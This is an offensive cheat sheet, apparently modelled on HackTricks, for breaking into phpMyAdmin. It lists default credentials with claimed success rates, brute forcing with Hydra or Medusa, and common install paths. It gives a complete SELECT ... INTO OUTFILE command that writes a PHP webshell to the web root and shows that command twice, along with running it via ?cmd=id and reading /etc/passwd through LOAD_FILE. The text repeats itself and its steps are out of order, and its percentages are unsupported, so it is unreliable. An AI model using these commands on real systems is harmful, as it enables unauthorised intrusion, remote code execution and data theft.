
Phpmyadmin Hacktricks Verified -

If the database user has the FILE privilege and secure_file_priv is empty, write a webshell:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";

Verification: Check secure_file_priv:

SHOW VARIABLES LIKE "secure_file_priv";

HackTricks Verified: On older MySQL, you can use INTO DUMPFILE for binary shells (e.g., reverse shell ELF).

Despite decades of warnings, default credentials remain the top entry method.

| Credential Pair | Success Rate (Audited) |
|-----------------|------------------------|
| root: (blank) | ~12% of default XAMPP/LAMP |
| root:root | ~8% |
| root:123456 | ~5% |
| pma:pmapassword | Older configs |
| admin:admin | Custom setups |

Verification: Use Hydra or Medusa with a small user/pass list. Limit to 5 attempts/sec to avoid lockouts.

After getting shell or RCE:

LOAD_FILE("/etc/passwd")

Works if secure_file_priv is not set to a restrictive directory.

If the database user has the FILE privilege, you can write a webshell.

Verification steps:

SHOW VARIABLES LIKE 'secure_file_priv';

Write a PHP shell:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php";

Then access: http://target/shell.php?cmd=id

Verified: Works on Apache with default www-data permissions. Fails if secure_file_priv is set or the web directory is not writable.

Scanning for these paths yields results in >70% of default installations:

/phpmyadmin/
/pma/
/dbadmin/
/myadmin/
/phpMyAdmin/
/MySQL/
/phpmyadmin2/
/phpmyadmin3/
/pma_db/

Verification tip: Use curl -k -I https://target/phpmyadmin/ and look for the Set-Cookie: phpMyAdmin= header. That header is unique to phpMyAdmin.

Before exploiting, you must find the interface. phpMyAdmin paths are predictable.